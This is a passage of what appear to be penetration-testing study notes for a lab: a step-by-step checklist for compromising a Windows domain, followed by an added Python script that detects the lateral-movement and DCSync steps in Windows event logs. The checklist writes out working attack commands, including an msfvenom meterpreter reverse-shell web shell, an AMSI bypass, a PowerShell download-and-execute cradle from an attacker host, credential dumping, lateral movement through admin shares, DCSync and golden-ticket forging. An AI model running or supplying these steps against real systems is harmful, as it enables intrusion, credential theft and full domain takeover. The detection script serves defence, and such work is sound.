Checklist / Flow
Enumeration; also check for ports 5985/5986 (WinRM) for evil-winrm
sudo nmap -A -sC -Pn 192.168.120.130-132 -vv
Check web server:
email present = phishing with doc / hta
command utilities / debug page = command injection RCE with rev.ps1
upload available = web shell (e.g. aspx)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f aspx -o /home/kali/met.aspx
+ non-emulated API AV bypass + shellcode encoding
Finding the upload directory:
gobuster dir -e -u http://192.168.120.132/ -w /usr/share/wordlists/dirb/common.txt
Post-Exploit Enum
QoL: in meterpreter, run execute -H -f notepad, then migrate into the new hidden process
Check:
disable AMSI to run PowerView
(new-object system.net.webclient).downloadstring('http://192.168.119.120/powerview.ps1') | IEX
Get-DomainComputer, Get-DomainUser, Get-DomainGroup, check Kerberos delegation
Privilege Escalation: reflectively load PrintSpoofer when running as a service account
Dump credentials (meterpreter upload / download); enumerate for config files, custom files, etc.
Use the credentials to perform possible domain attacks
Possibly become the admin user on a vulnerable server via PtT with impersonated tickets > disable AV
Transfer files through shares (controlled host 1 to newly compromised host 2):
copy C:\inetpub\wwwroot\upload\inject.exe \\file01\c$
use fileless lateral movement with process injection to control host 2 from host 1
copy c:\inject.exe \\dc02\c$
->lat.exe dc02 sensorservice C:\inject.exe
Repeat credential dumps; also look for impersonation opportunities
DCSync once the domain is compromised to access other accounts; golden ticket with the DC's krbtgt account
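A defender-side check for the lateral movement and DCSync steps above, added here as an example and not part of the original notes: it scans constructed Windows event records (5145 write to an admin share, 7045 service install, 4662 carrying the DS-Replication-Get-Changes GUID) for an admin-share write followed by a service install on the same host, and for replication rights used by a non-DC principal. The field names and sample records are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Constructed sample events modelled on Security (5145, 4662) and System (7045)
# log fields; they are fabricated for this example, not real captures.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:05", "id": 5145, "host": "dc02", "user": "jeff",
     "share": r"\\*\C$", "access": "0x2", "path": "inject.exe"},
    {"time": "2024-01-10T09:00:40", "id": 7045, "host": "dc02", "user": "jeff",
     "service": "sensorservice", "image": r"C:\inject.exe"},
    {"time": "2024-01-10T09:05:00", "id": 4662, "host": "dc02", "user": "jeff",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"time": "2024-01-10T10:00:00", "id": 4662, "host": "dc02", "user": "DC01$",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

# Control access right GUID for DS-Replication-Get-Changes, seen in 4662 Properties.
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
ADMIN_SHARES = {r"\\*\C$", r"\\*\ADMIN$"}
WINDOW = timedelta(minutes=10)  # assumed correlation window


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect(events):
    """Return (rule, host, user) tuples for the suspicious sequences found."""
    alerts = []
    events = sorted(events, key=_ts)
    for i, event in enumerate(events):
        # Rule 1: write (AccessMask bit 0x2) to an admin share, then a new
        # service installed on the same host within the window.
        if (event["id"] == 5145 and event.get("share") in ADMIN_SHARES
                and int(event["access"], 16) & 0x2):
            for later in events[i + 1:]:
                if _ts(later) - _ts(event) > WINDOW:
                    break
                if later["id"] == 7045 and later["host"] == event["host"]:
                    alerts.append(("admin_share_write_then_service_install",
                                   event["host"], later["user"]))
                    break
        # Rule 2: replication right exercised by a principal that is not a
        # machine account (DC computer accounts end with '$').
        if (event["id"] == 4662
                and REPL_GET_CHANGES in event.get("properties", "").lower()
                and not event["user"].endswith("$")):
            alerts.append(("replication_by_non_dc_account", event["host"], event["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```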